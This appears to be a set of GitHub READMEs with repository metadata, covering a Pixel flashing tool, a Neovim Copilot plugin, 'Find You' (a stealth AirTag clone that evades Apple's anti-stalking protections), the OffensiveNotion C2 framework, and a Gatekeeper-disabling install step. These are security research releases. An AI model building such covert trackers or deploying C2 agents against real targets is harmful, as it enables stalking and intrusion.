9. Select the Flash Mode; PixelFlasher will automatically select the applicable flash mode based on the selected image type.
    - If a full OTA image is selected in step 4:
        - **Full OTA**: Will flash the full OTA image in sideload mode. Features of this mode:
            - This will always flash to the **inactive slot only** (hence the option to flash to both slots is disabled), similar to how OTA updates happen on the phone.
            - It will always **Keep Data**; there is no option for **Wipe**, hence that option is disabled.
            - If something goes wrong during flashing, the active slot is unaffected and the phone boots back to the active, functional slot.
            - If you flash to both slots (i.e. flash twice in a row) then both slots would be bootable.
            - Your phone's bootloader does not have to be unlocked to be able to flash a full OTA image (stock boot only).
            - You cannot downgrade with OTA; the version being installed has to be equal or higher.
    - If factory firmware is selected in step 4:
        - **Keep Data**: In this mode the `-w` flag is removed from the flash scripts so that data is not wiped. This is commonly known as `dirty flashing`.
        - **WIPE all data**: As the text suggests, this will wipe your data; use it with caution!
        If this mode is selected, PixelFlasher will ask for confirmation during the flashing phase.
        - **Dry Run**: In this mode, the phone will reboot to bootloader and then mimic the flash actions (i.e. reboot into bootloader) without actually flashing anything (it prints to the console the steps it would have performed if dry run was not chosen).
        This is handy for testing, to check whether PixelFlasher is properly able to control fastboot commands.
10. Optional: Open the Magisk Modules Manager and disable (uncheck) modules known to cause issues during upgrades (highly recommended). (The modules in the list below have never caused issues for me, so I keep them enabled, YMMV.)
![Image of PixelFlasher GUI](/images/magisk-modules-manager.png)
11. **Flash Pixel Phone** This is the final step, to actually flash the phone in the selected `Flash Mode`.
**Note**: Unlike previous versions of PixelFlasher, all the options are dynamic, i.e. they depend on what you select before clicking the Flash button; there is no longer a concept of a prepared package.
PixelFlasher will first present you the selected options and ask for your confirmation if you want to proceed with flashing.
12. Monitor the **console** output and observe the performed actions and their outcomes.
13. In case of trouble, click the **Support** button to generate a sanitized (redacted) support logs archive.

### Expert Mode

To enable the expert mode, use **File Menu | Advanced Configuration** and select `Enable Advanced Options`.

![Image of PixelFlasher GUI](/images/advanced-options.png)

![Image of PixelFlasher GUI](/images/advanced-gui.png)

In this mode the following additional options are exposed (green bounding boxes). The notes below are more an enumeration than a guide, as the options should be trivial and obvious to an expert.

1. Option to change the active slot (the inactive slot is automatically selected).
Options to reboot to Recovery, Download, Safe Mode.
2. Options to lock / unlock the bootloader, option to disable Magisk modules when bootlooping, partitions manager.
3. Apply Custom ROM. This replaces the factory ROM image with the selected file.
PixelFlasher extracts `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) from the ROM image and displays it below for selection or patching. Please make sure to read the documentation of the chosen ROM, as each custom ROM's instructions can differ. To be clear, this is what PixelFlasher does internally when this mode is selected; please understand it, and don't use this mode if the selected ROM's guide does not fit the bill. You've been warned!
   - Keeps stock bootloader and radio images.
   - Replaces the stock ROM image with the selected custom ROM image.
   - Flashes in the chosen `Flash Mode` just like a stock image, i.e. bootloader, custom ROM and radio images in the original order that they were in the stock firmware.
   - Patching `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) can be performed if the option is selected. You can select any of the listed files.
   - Flash Mode is similar to the basic flash mode described above in step 7.
4. Custom Flash. Select this to switch from flashing a factory image to flashing a single file.
5. Browse to select a valid image file (.img or .zip), or select a boot.img from the list above and click on the paste button to paste the selected boot.img into the file selection. Use the dropdown to select the image type.
   - boot (can be flashed to Live or boot) - Expected file type .img
   - bootloader - Expected file type .img
   - init_boot - Expected file type .img
   - dtbo - Expected file type .img
   - product - Expected file type .img
   - radio - Expected file type .img
   - recovery - Expected file type .img
   - super_empty - Expected file type .img
   - system - Expected file type .img
   - system_ext - Expected file type .img
   - system_other - Expected file type .img
   - vbmeta - Expected file type .img
   - vbmeta_system - Expected file type .img
   - vbmeta_vendor - Expected file type .img
   - vendor - Expected file type .img
   - vendor_boot - Expected file type .img
   - vendor_dlkm (the device will be put into fastbootd mode during this operation) - Expected file type .img
   - image - Expected file type .zip
   - SIDELOAD - Expected file type .zip

   Select the appropriate flash options. **Note:** For Tensor devices (Pixel 6 or newer), when the `Flash to both slots` option is selected, PixelFlasher flashes each slot individually to work around a Google bug where flashing with the `--slot=all` option fails.

## Credits

- First and foremost [Magisk](https://github.com/topjohnwu/Magisk/releases) by [John Wu](https://github.com/topjohnwu), which made rooting Pixel™ phones possible; without it none of this would have mattered.
- Big thanks to [[ryder203]](https://www.t-ryder.de/), [[t-ryder]](https://xdaforums.com/m/t-ryder.3705546/) for their valuable ideas, feedback and testing. Your contributions are very much appreciated.
- [[Homeboy76]](https://xdaforums.com/m/homeboy76.4810220/), [[v0latyle]](https://xdaforums.com/m/v0latyle.3690504/) and [[roirraW-edor-ehT]](https://xdaforums.com/m/roirraw-edor-eht.2560614/) at [xda](https://xdaforums.com/) for their excellent guides [[here](https://xdaforums.com/t/guide-november-6-2023-root-pixel-8-pro-unlock-bootloader-pass-safetynet-both-slots-bootable-more.4638510/#post-89128833/), [here](https://xdaforums.com/t/guide-pixel-6-oriole-unlock-bootloader-update-root-pass-safetynet.4356233/) and [here](https://xdaforums.com/t/november-6-2023-ud1a-231105-004-magisk-stable-v26-4-released-unlock-bootloader-root-pixel-8-pro-husky-safetynet.4633839/)] on Pixel™ series phones. This program could not have been possible without their easy-to-follow guides.
  I strongly encourage all beginners to follow those guides rather than use this program; it is important to understand the basic steps involved before diving into one-click tools or advanced tasks.
- Marcel Stör's [nodemcu-pyflasher](https://github.com/marcelstoer/nodemcu-pyflasher) source code, which jump-started my introduction to [wxPython](https://www.wxpython.org/) and eventually this program.
- [wxPython Team](https://wxpython.org/) for their cross-platform GUI toolkit for Python.
- [JackMcKew](https://github.com/JackMcKew) for pyinstaller Github Actions.
- Endless counts of [xda](https://xdaforums.com/) members and their posts that tirelessly answer questions and share tools. Too many to enumerate.
- Artwork / graphics / icons, designed and supplied by: [[ryder203]](https://www.t-ryder.de/), [[t-ryder]](https://xdaforums.com/m/t-ryder.3705546/) based on [material-design-icons](https://github.com/google/material-design-icons/blob/master/LICENSE)
- vm03's [payload_dumper](https://github.com/vm03/payload_dumper) source code to extract images from payload.bin files.

## Troubleshooting

If you need support or assistance, please **generate and provide a support file** from within PixelFlasher. You can hit that big Support button on the main screen, or select it from the Help menu. The generated support.zip file is sanitized (redacted) to keep your sensitive information (username, device id, ...) private.

- If your anti-virus program is telling you that PixelFlasher is malware, or you are concerned in any way, please check [this post](https://xdaforums.com/t/pixelflasher-a-gui-tool-for-flashing-updating-rooting-managing-pixel-phones.4415453/post-89090938) about false positives.

## Disclaimer

```text
********************************************************************************
PLEASE DO YOUR PART AND READ / SEARCH / RESEARCH BEFORE USING THIS PROGRAM
AND/OR ATTEMPTING ANY MODIFICATIONS ON YOUR DEVICE.
THIS PROGRAM ASSUMES THAT YOU ALREADY KNOW HOW TO AND HAVE ALREADY UNLOCKED
YOUR BOOTLOADER, ALREADY ROOTED YOUR DEVICE, AND KNOW HOW TO USE ANDROID SDK
PLATFORM-TOOLS, ETC.
THIS TOOL IS SIMPLY MY QUICK WAY OF UPDATING THE FIRMWARE WHILE ROOTED WITH
MAGISK, WITHOUT LOSING DATA / REQUIRING A WIPE.
MODIFYING YOUR DEVICE COMES WITH INHERENT RISKS, AND IT'S NOT MY RESPONSIBILITY
IF YOU LOSE YOUR DATA OR BRICK YOUR DEVICE. THE TOOL I SHARE HAS WORKED FOR ME,
BUT THAT DOESN'T MEAN THAT YOU MAY NOT RUN INTO PROBLEMS. **BACKUP YOUR DATA.**
********************************************************************************
```
Pixel™ phone flashing GUI utility with features.
python,wxpython,windows,root,flash,pyinstaller,pixel,rom,adb,android
84
7
15
313
3
3
10
zbirenbaum/copilot-cmp
# copilot-cmp

This repository transforms https://github.com/zbirenbaum/copilot.lua into a cmp source. Copilot suggestions will automatically be loaded into your cmp menu as snippets and display their full contents when a copilot suggestion is hovered.

![copilot-cmp](https://user-images.githubusercontent.com/32016110/173933674-9ad85a5a-5ad7-41cd-9fcc-f5a698cc88ae.png)

## Setup

If you already have copilot.lua installed, you can install this plugin with your plugin manager as you would any other, using the following code:

### Install

#### Lazy

```lua
{
  "zbirenbaum/copilot-cmp",
  config = function ()
    require("copilot_cmp").setup()
  end
}
```

#### Packer

```lua
use {
  "zbirenbaum/copilot-cmp",
  after = { "copilot.lua" },
  config = function ()
    require("copilot_cmp").setup()
  end
}
```

If you do not have copilot.lua installed, go to https://github.com/zbirenbaum/copilot.lua and follow the instructions there before installing this one.

It is recommended to disable copilot.lua's suggestion and panel modules, as they can interfere with completions properly appearing in copilot-cmp. To do so, simply place the following in your copilot.lua config:

```lua
require("copilot").setup({
  suggestion = { enabled = false },
  panel = { enabled = false },
})
```

### Configuration:

#### nvim-cmp:

##### Source Definition

To link cmp with this source, simply go into your cmp configuration file and include `{ name = "copilot" }` under your sources.

Here is an example of what it should look like:

```lua
cmp.setup {
  ...
  sources = {
    -- Copilot Source
    { name = "copilot", group_index = 2 },
    -- Other Sources
    { name = "nvim_lsp", group_index = 2 },
    { name = "path", group_index = 2 },
    { name = "luasnip", group_index = 2 },
  },
  ...
}
```

##### Highlighting & Icon

Copilot's cmp source now has a built-in highlight group `CmpItemKindCopilot`. To add an icon for Copilot to lspkind, simply add Copilot to your lspkind symbol map.

```lua
-- lspkind.lua
local lspkind = require("lspkind")
lspkind.init({
  symbol_map = {
    Copilot = "",
  },
})

vim.api.nvim_set_hl(0, "CmpItemKindCopilot", {fg ="#6CC644"})
```

Alternatively, you can add Copilot to the lspkind `symbol_map` within the cmp format function.

```lua
-- cmp.lua
cmp.setup {
  ...
  formatting = {
    format = lspkind.cmp_format({
      mode = "symbol",
      max_width = 50,
      symbol_map = { Copilot = "" }
    })
  }
  ...
}
```

If you do not use lspkind, simply add the custom icon however you normally handle `kind` formatting and it will integrate as if it were any other normal lsp completion kind.

##### Tab Completion Configuration (Highly Recommended)

Unlike other completion sources, copilot can use other lines above or below an empty line to provide a completion. This can be problematic for individuals who select menu entries with `<TAB>`. This behavior is configurable via cmp's config, and the following code will make it so that the menu still appears normally, but tab will fall back to indenting unless a non-whitespace character has actually been typed.
```lua
-- Returns true only when the cursor is preceded by non-whitespace text
-- (and the current buffer is not a prompt buffer).
local has_words_before = function()
  if vim.api.nvim_buf_get_option(0, "buftype") == "prompt" then return false end
  local line, col = unpack(vim.api.nvim_win_get_cursor(0))
  return col ~= 0 and vim.api.nvim_buf_get_text(0, line-1, 0, line-1, col, {})[1]:match("^%s*$") == nil
end

cmp.setup({
  mapping = {
    ["<Tab>"] = vim.schedule_wrap(function(fallback)
      if cmp.visible() and has_words_before() then
        cmp.select_next_item({ behavior = cmp.SelectBehavior.Select })
      else
        fallback()
      end
    end),
  },
})
```

##### Comparators

One custom comparator for sorting cmp entries is provided: `prioritize`. The `prioritize` comparator causes copilot entries to appear higher in the cmp menu. It is recommended to keep `priority_weight` at 2, or to place the `exact` comparator above copilot, so that better lsp matches are not stuck below poor copilot matches.

Example:

```lua
cmp.setup {
  ...
  sorting = {
    priority_weight = 2,
    comparators = {
      require("copilot_cmp.comparators").prioritize,

      -- Below is the default comparator list and order for nvim-cmp
      cmp.config.compare.offset,
      -- cmp.config.compare.scopes, --this is commented in nvim-cmp too
      cmp.config.compare.exact,
      cmp.config.compare.score,
      cmp.config.compare.recently_used,
      cmp.config.compare.locality,
      cmp.config.compare.kind,
      cmp.config.compare.sort_text,
      cmp.config.compare.length,
      cmp.config.compare.order,
    },
  },
  ...
}
```

#### copilot-cmp:

Note: It is now **heavily** discouraged to modify the default settings unless an issue gives you good reason to do so.

The configurable options for this plugin are as follows:

```lua
{
  event = { "InsertEnter", "LspAttach" },
  fix_pairs = true,
}
```

##### event

The event parameter configures when the source is registered. Unless you have a unique problem for your particular configuration, you probably don't want to touch this.

##### fix_pairs

Suppose you have the following code: `print('h')`

Copilot might try to account for the `'` and `)` and complete it with this: `print('hello`

This is not good behavior for consistency reasons and will just end up deleting the two ending characters. This option fixes that. Don't turn this off unless you are having problems with pairs and believe this might be causing them.
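For reference, here is a minimal sketch of a full setup call that passes these options explicitly — the values shown are just the defaults from the table above, so this is equivalent to a bare `require("copilot_cmp").setup()`:

```lua
-- Minimal sketch: the options below are the documented defaults, so passing
-- them explicitly is optional and purely illustrative.
require("copilot_cmp").setup({
  event = { "InsertEnter", "LspAttach" }, -- when the source registers itself
  fix_pairs = true,                       -- fix completions around existing pairs (see above)
})
```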
Lua plugin to turn github copilot into a cmp source
copilot,lua,neovim,nvim-cmp,github-copilot
0
14
25
91
12
14
0
positive-security/find-you
# Find You

A modified version of OpenHaystack to showcase the possibility of building a stealth AirTag clone that bypasses all of Apple's tracking protection features. More information can be found here: [https://positive.security/blog/find-you](https://positive.security/blog/find-you)

![Find You Cover](Resources/FindYouCover.png)

**Please note:** The below-mentioned `generate_keypairs.py` has been purposefully left out of this repository and left as an exercise for the reader.

## Changes

### Tracker side

- Added a Python script (not included in this release, as noted above) that pre-generates EC key pairs and generates:
  - A list of public keys in C source code format to add to the firmware
  - A list of private keys as an OpenHaystack-compatible `.plist` file to import in the retrieval application
- Added support to iterate over a preloaded list of public keys with 1 beacon per key and a configurable delay

### Retrieval side

- Optimized the application to be able to handle thousands of tags
- Combined public keys to request across different tags into a single HTTP request
- Slightly optimized the quadratic complexity when assigning decrypted reports to accessories
- Removed keychain operations (the app will always start without any tags configured)

## Instructions

1. Run `generate_keypairs.py` with the number of keypairs to generate as argument (e.g. `python3 generate_keypairs.py 2000`)
2. Copy the array definition in `pub_keys_c.txt` into `Firmware/ESP32/main/openhaystack_main.c` (if desired, also change the delay time between beacons)
3. Compile firmware and flash ESP32
4. Compile and run the macOS retrieval application and import `accessory_list.plist` (generated in step #1)

# <img src="Resources/Icon/OpenHaystackIcon.png" alt="OpenHaystack application icon" height=42 width=42 valign=bottom /> OpenHaystack

OpenHaystack is a framework for tracking personal Bluetooth devices via Apple's massive Find My network. Use it to create your own tracking _tags_ that you can append to physical objects (keyrings, backpacks, ...) or integrate it into other Bluetooth-capable devices such as notebooks.

<img src="Resources/OpenHaystack-Screenshot.png" alt="Screenshot of the app" width="701" />

## Table of contents

- [What is _OpenHaystack_?](#what-is-openhaystack)
  - [History](#history)
  - [Disclaimer](#disclaimer)
- [How to use _OpenHaystack_?](#how-to-use-openhaystack)
  - [System requirements](#system-requirements)
  - [Installation](#installation)
  - [Usage](#usage)
- [How does Apple's Find My network work?](#how-does-apples-find-my-network-work)
  - [Pairing](#pairing-1)
  - [Losing](#losing-2)
  - [Finding](#finding-3)
  - [Searching](#searching-4)
- [How to track other Bluetooth devices?](#how-to-track-other-bluetooth-devices)
- [Authors](#authors)
- [References](#references)
- [License](#license)

## What is _OpenHaystack_?

OpenHaystack is an application that allows you to create your own accessories that are tracked by Apple's [Find My network](#how-does-apples-find-my-network-work). All you need is a Mac and a [BBC micro:bit](https://microbit.org/) or any [other Bluetooth-capable device](#how-to-track-other-bluetooth-devices). By using the app, you can track your accessories anywhere on earth without cellular coverage. Nearby iPhones will discover your accessories and upload their location to Apple's servers when they have a network connection.

### History

OpenHaystack is the result of reverse-engineering and security analysis work of Apple's _Find My network_ (or _offline finding_).
We at the [Secure Mobile Networking Lab](https://seemoo.de) of TU Darmstadt started analyzing offline finding after its initial announcement in June 2019. Through this work, we identified how Apple devices can be found by iPhones, even when they are offline. The whole system is a clever combination of Bluetooth advertisements, public-key cryptography, and a central database of encrypted location reports. We disclosed a specification of the closed parts of offline finding and conducted a comprehensive security and privacy analysis. We found two distinct vulnerabilities. The most severe one, which allowed a malicious application to access location data, has meanwhile been fixed by Apple ([CVE-2020-9986](https://support.apple.com/en-us/HT211849)). For more information about the security analysis, please read [our paper](#references). Since its release, we received quite a bit of [press and media coverage](https://owlink.org/press/).

### Disclaimer

OpenHaystack is experimental software. The code is untested and incomplete. For example, OpenHaystack accessories using our [firmware](Firmware) broadcast a fixed public key and, therefore, are trackable by other devices in proximity (this might change in a future release). OpenHaystack is not affiliated with or endorsed by Apple Inc.

## How to use _OpenHaystack_?

OpenHaystack consists of two components. First, we provide a [macOS application](OpenHaystack) that can display the last reported location of your personal Bluetooth devices. Second, the [firmware image](Firmware) enables Bluetooth devices to broadcast beacons that make them discoverable by iPhones.

### System requirements

OpenHaystack requires macOS 11 (Big Sur).

### Installation

The OpenHaystack application requires a custom plugin for Apple Mail. It is used to download location reports from Apple's servers via a private API (technical explanation: the plugin inherits Apple Mail's entitlements required to use this API). Therefore, the installation procedure is slightly different and requires you to temporarily disable [Gatekeeper](https://support.apple.com/guide/security/gatekeeper-and-runtime-protection-sec5599b66df/1/web/1). Our plugin does not access any other private data such as emails (see [source code](OpenHaystack/OpenHaystackMail)).

1. Download a precompiled binary release from our <a href="https://github.com/seemoo-lab/openhaystack/releases">GitHub page</a>. _Alternative:_ build the application from source via Xcode.
2. Open OpenHaystack. This will ask you to install the Mail plugin in `~/Library/Mail/Bundle`.
3. Open a terminal and run `sudo spctl --master-disable`, which will disable Gatekeeper and allow our Apple Mail plugin to run.
4. Open Apple Mail. Go to _Preferences_ → _General_ → _Manage Plug-Ins..._ and activate the checkbox next to _OpenHaystackMail.mailbundle_.
   * If the _Manage Plug-Ins..._ button does not appear, run this command in a terminal: `sudo defaults write "/Library/Preferences/com.apple.mail" EnableBundles 1`
5. Allow access and restart Mail.
6. Open a terminal and enter `sudo spctl --master-enable`, which will enable Gatekeeper again.

### Usage

**Adding a new accessory.** To create a new accessory, you just need to enter a name for it and optionally select a suitable icon and a color. The app then generates a new key pair that is used to encrypt and decrypt the location reports. The private key is stored in your Mac's keychain.
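As a rough illustration of that key-generation step, the sketch below creates a P-224 key pair (the curve named in the Pairing section further down) using Python's third-party `cryptography` package. The library choice is our assumption, and this is explicitly *not* the omitted `generate_keypairs.py`:

```python
# Minimal sketch (assumption: the third-party `cryptography` package).
# This is NOT the purposefully omitted generate_keypairs.py.
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ec

# P-224 is the curve used for Find My accessory keys (see "Pairing" below).
private_key = ec.generate_private_key(ec.SECP224R1())

# The public key is what an accessory would advertise over BLE.
public_bytes = private_key.public_key().public_bytes(
    encoding=serialization.Encoding.X962,
    format=serialization.PublicFormat.UncompressedPoint,
)
print(public_bytes.hex())
```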
**Deploy to device.** Connect a [supported device](#how-to-track-other-bluetooth-devices) via USB to your Mac, hit the _Deploy_ button next to the accessory's name, and choose the corresponding deployment target. Instead of using OpenHaystack's integrated deployment, you may also copy the public key used for advertising (right click on accessory) and deploy it manually.

**Display devices' locations.** It can take up to 30 minutes until you see the first location report on the map on the right side. The map will always show all your items' most recent locations. You can click on every item to check when the last update was received. By clicking the reload button, you can update the location reports.

## How does Apple's Find My network work?

We briefly explain Apple's offline finding system (aka [_Find My network_](https://developer.apple.com/find-my/)). Please refer to our [PETS paper and Apple's accessory specification](#references) for more details. We provide a schematic overview (from our paper) and explain how we integrate the different steps in OpenHaystack below.

![Find My Overview](Resources/FindMyOverview.png)

### Pairing (1)

To use Apple's Find My network, we generate a public-private key pair on an elliptic curve (P-224). The private key remains on the Mac, securely stored in the keychain, and the public key is deployed on the accessory, e.g., an attached micro:bit.

### Losing (2)

In short, the accessories broadcast the public key as Bluetooth Low Energy (BLE) advertisements (see [firmware](Firmware)). Nearby iPhones will not be able to distinguish our accessories from a genuine Apple device or certified accessory.

### Finding (3)

When a nearby iPhone receives a BLE advertisement, the iPhone fetches its current location via GPS, encrypts it using the public key from the advertisement, and uploads the encrypted report to Apple's server. All iPhones on iOS 13 or newer do this by default. OpenHaystack is not involved in this step.

### Searching (4)

Apple does not know which encrypted locations belong to which Apple account or device. Therefore, every Apple user can download any location report as long as they know the corresponding public key. This is not a security issue: all reports are end-to-end encrypted and cannot be decrypted unless one knows the corresponding private key (stored in the keychain). We leverage this feature to download the reports from Apple that have been created for our OpenHaystack accessories. We use our private keys to decrypt the location reports and show the most recent one on the map.

Apple protects their database against arbitrary access by requiring an authenticated Apple user to download location reports. We use our Apple Mail plugin, which runs with elevated privileges, to access the required authentication information. The OpenHaystack app communicates with the plugin while downloading reports. This is why you need to keep Mail open while using OpenHaystack.

## How to track other Bluetooth devices?

In principle, any Bluetooth device can be turned into an OpenHaystack accessory that is trackable via Apple's Find My network. Currently, we provide a convenient deployment method for our OpenHaystack firmware on a small number of embedded devices (see table below). We also support Linux devices via our generic HCI script. Feel free to port OpenHaystack to other devices that support Bluetooth Low Energy based on the [source code of our firmware](Firmware) and the specification in [our paper](#references). Please share your results with us!
| Platform | Tested on | Deploy via app | Comment |
|----------|-----------|:--------------:|---------|
| [Nordic nRF51](Firmware/Microbit_v1) | BBC micro:bit v1 | ✓ | Only supports nRF51822 at this time (see issue #6). |
| [Espressif ESP32](Firmware/ESP32) | ESP32-WROOM, ESP32-WROVER | ✓ | Deployment can take up to 3 minutes. Requires Python 3. Thanks **@fhessel**. |
| [Linux HCI](Firmware/Linux_HCI) | Raspberry Pi 4 w/ Raspbian | | Should support any Linux machine. |

![Setup](Resources/Setup.jpg)

## Authors

- **Alexander Heinrich** ([@Sn0wfreezeDev](https://github.com/Sn0wfreezeDev), [email](mailto:aheinrich@seemoo.tu-darmstadt.de))
- **Milan Stute** ([@schmittner](https://github.com/schmittner), [email](mailto:mstute@seemoo.tu-darmstadt.de), [web](https://seemoo.de/mstute))

## References

- Alexander Heinrich, Milan Stute, Tim Kornhuber, Matthias Hollick. **Who Can _Find My_ Devices? Security and Privacy of Apple's Crowd-Sourced Bluetooth Location Tracking System.** _Proceedings on Privacy Enhancing Technologies (PoPETs)_, 2021. [doi:10.2478/popets-2021-0045](https://doi.org/10.2478/popets-2021-0045) [📄 Paper](https://www.petsymposium.org/2021/files/papers/issue3/popets-2021-0045.pdf) [📄 Preprint](https://arxiv.org/abs/2103.02282).
- Alexander Heinrich, Milan Stute, and Matthias Hollick. **DEMO: OpenHaystack: A Framework for Tracking Personal Bluetooth Devices via Apple's Massive Find My Network.** _14th ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec '21)_, 2021.
- Tim Kornhuber. **Analysis of Apple's Crowd-Sourced Location Tracking System.** _Technical University of Darmstadt_, Master's thesis, 2020.
- Apple Inc. **Find My Network Accessory Specification – Developer Preview – Release R3.** 2020. [📄 Download](https://developer.apple.com/find-my/).

## License

OpenHaystack and Find You are licensed under the [**GNU Affero General Public License v3.0**](LICENSE).
A stealth AirTag clone that bypasses all of Apple's tracking protection features
null
0
1
1
1
4
1
5
mttaggart/OffensiveNotion
<h1 align="center"> OffensiveNotion </h1>
<h3 align="center"> Notion (yes, the notetaking app) as a C2.</h3>
<div align="center">

---

A collaboration by:

[![Mttaggart](https://img.shields.io/static/v1?label=%20&message=MTTAGGART&color=blueviolet&style=for-the-badge)](https://twitter.com/mttaggart) [![HuskyHacks](https://img.shields.io/static/v1?label=%20&message=HUSKYHACKS&color=008080&style=for-the-badge)](https://twitter.com/huskyhacksmk)

---

[Documentation][wiki]&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;[Pull Requests][pr]&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;[Issues][issues]

![Release][release] [![Pull Requests][img-pr-badge]][pr] [![License][img-license-badge]][license]

</div>

---

![on](https://user-images.githubusercontent.com/57866415/155594981-1ae9212e-a0f9-4ff3-8a81-8946546dc0a3.gif)

### Wait, What?

Yes.

### But Why?

What started as a meme grew into a full project. Just roll with it.

### Read more!

Here's our blog post about it: [We Put A C2 In Your Notetaking App: OffensiveNotion](https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332)

## Features

* 📡 A full-featured C2 platform built on the Notion notetaking app.
* 🚧 Easy setup: set up your Notion developer API account, drop the Agent to the target, run and enjoy!
* 🖥️ Cross-platform agent built in Rust that compiles for Linux, Windows, and macOS with the same code base. Includes a Python setup/controller script to simplify the process.
* ☢️ A range of capabilities including port-scanning, privilege escalation, asynchronous command execution, file download, and shellcode injection, all controlled from the comfort of a Notion page!
* 📜 Document as you go! The agent identifies special syntax to run commands, so feel free to use the rest of the Notion page to document your operation.
* 🤝 Collaborative by design! Notion allows for multiple people to edit and view your notes. Your listener page can handle multiple agents and you can invite your red team friends to your page. Congratulations, that's a teamserver!
* 📱 Mobile C2! Use the Notion application from your mobile device to issue commands to your agents from anywhere in the world.
* 🕵️‍♀️ Stealth! C2 comms ride over the Notion API natively. Your C2 traffic looks like someone is using Notion for its intended purpose.

## Quickstart

See the [Quickstart guide](https://github.com/mttaggart/OffensiveNotion/wiki/2.-Quickstart) on how to get going right away!

## Documentation

Please see the [Wiki][wiki] for setup, usage, commands, and more!

## Thanks & Acknowledgements

> This project has been a blast for me! I learned a ton about Rust and how the mechanics of a C2 work. So thank you to my co-creator @mttaggart for helping me along the way. None of this would have been possible without your technical acumen and creativity.
>
> Thank you to Joe Helle (@joehelle) for the POC steps for the fodhelper UAC bypass.
>
> Thank you to all of the great red team devs who came before me, too numerous to list them all, who have created some of my favorite tools. I'm continually inspired by the red dev innovation in our field.
>
> -Husky
>
> As a fairly new security person, I had no idea I'd end up working with such a fantastically talented, kind, and reliable partner and hacker as @HuskyHacks. It's been a true privilege to build this alongside him.
>
> I want to thank the [Taggart Tech](https://twitch.tv/mttaggart) community for supporting us along the way and always offering helpful feedback.
> This would not be possible without you all.
>
> -Taggart

## Contributors

The dev team would like to thank the following contributors for their work on OffensiveNotion:

| Contributor | Contribution |
| ----------- | ------------ |
| [@MEhrn00](https://github.com/MEhrn00) | Execution guardrails for domain name/joined status 🚀 |
| [@hitcxy](https://github.com/hitcxy) | Improved shell encoding 🚀 |

---

| Legend |
| ------ |
| 🚀 - Issue/PR submitted and code landed |
| 💡 - Cool ideas |
| 🤔 - Consultation/Inspiration |
| 🐛 - Bug submission/fix |

## Disclaimer

There is no way to make an offensive-security-relevant research tool and release it open source without the possibility of it falling into the wrong hands. This tool is only to be used for legal, ethical purposes including, but not limited to, research, security assessment, and education. The dev team is not responsible for the misuse of this tool by anyone if used for illegal/unethical purposes. No animals were harmed in the making of this code base (although Cosmo keeps climbing on my keyboard and I have to put him over on the couch, which I'm sure must feel like torture to him). See the LICENSE for more details.

<!-- Links -->
[issues]:https://github.com/mttaggart/OffensiveNotion/issues "OffensiveNotion Issues ➶"
[wiki]:https://github.com/mttaggart/OffensiveNotion/wiki "OffensiveNotion Documentation ➶"
[repo]:https://github.com/mttaggart/OffensiveNotion "OffensiveNotion Repository ➶"
[pr]:https://github.com/mttaggart/OffensiveNotion/pulls "OffensiveNotion Pull Requests ➶"
[license]:https://github.com/mttaggart/OffensiveNotion/blob/main/LICENSE "OffensiveNotion License File ➶"
[release]:https://img.shields.io/github/v/release/mttaggart/OffensiveNotion?label=RELEASE%3A%20Toledo&style=for-the-badge

<!-- Badges -->
[lastcommit]:https://img.shields.io/github/last-commit/mttaggart/OffensiveNotion?style=for-the-badge
[img-pr-badge]:https://img.shields.io/badge/PRs-welcome-orange.svg?style=for-the-badge&logo=data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48c3ZnIGlkPSJzdmcyIiB3aWR0aD0iNjQ1IiBoZWlnaHQ9IjU4NSIgdmVyc2lvbj0iMS4wIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPiA8ZyBpZD0ibGF5ZXIxIj4gIDxwYXRoIGlkPSJwYXRoMjQxNyIgZD0ibTI5Ny4zIDU1MC44N2MtMTMuNzc1LTE1LjQzNi00OC4xNzEtNDUuNTMtNzYuNDM1LTY2Ljg3NC04My43NDQtNjMuMjQyLTk1LjE0Mi03Mi4zOTQtMTI5LjE0LTEwMy43LTYyLjY4NS01Ny43Mi04OS4zMDYtMTE1LjcxLTg5LjIxNC0xOTQuMzQgMC4wNDQ1MTItMzguMzg0IDIuNjYwOC01My4xNzIgMTMuNDEtNzUuNzk3IDE4LjIzNy0zOC4zODYgNDUuMS02Ni45MDkgNzkuNDQ1LTg0LjM1NSAyNC4zMjUtMTIuMzU2IDM2LjMyMy0xNy44NDUgNzYuOTQ0LTE4LjA3IDQyLjQ5My0wLjIzNDgzIDUxLjQzOSA0LjcxOTcgNzYuNDM1IDE4LjQ1MiAzMC40MjUgMTYuNzE0IDYxLjc0IDUyLjQzNiA2OC4yMTMgNzcuODExbDMuOTk4MSAxNS42NzIgOS44NTk2LTIxLjU4NWM1NS43MTYtMTIxLjk3IDIzMy42LTEyMC4xNSAyOTUuNSAzLjAzMTYgMTkuNjM4IDM5LjA3NiAyMS43OTQgMTIyLjUxIDQuMzgwMSAxNjkuNTEtMjIuNzE1IDYxLjMwOS02NS4zOCAxMDguMDUtMTY0LjAxIDE3OS42OC02NC42ODEgNDYuOTc0LTEzNy44OCAxMTguMDUtMTQyLjk4IDEyOC4wMy01LjkxNTUgMTEuNTg4LTAuMjgyMTYgMS44MTU5LTI2LjQwOC0yNy40NjF6IiBmaWxsPSIjZGQ1MDRmIi8%2BIDwvZz48L3N2Zz4%3D
[img-license-badge]:https://img.shields.io/badge/license-mit-367588.svg?style=for-the-badge
Notion as a platform for offensive operations
null
7
6
83
548
13
7
1
cubxxw/awesome-cs-cloudnative-blockchain
# The Rookie's Growth Handbook[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/cubxxw/cs-awesome-Block_Chain)

## 🧭 Navigation

+ 🔍[**Quick guide (wiki) — repository summary**](https://github.com/cubxxw/Block_Chain/wiki)
+ 🔗[**Accelerated mirror for mainland China (Gitee)**](https://gitee.com/xxw3293172751/Block_Chain)
+ 📵[**Unthrottled online personal cloud drive**](https://xxw.nsddd.top/s/wRSz)

<p align='center'>
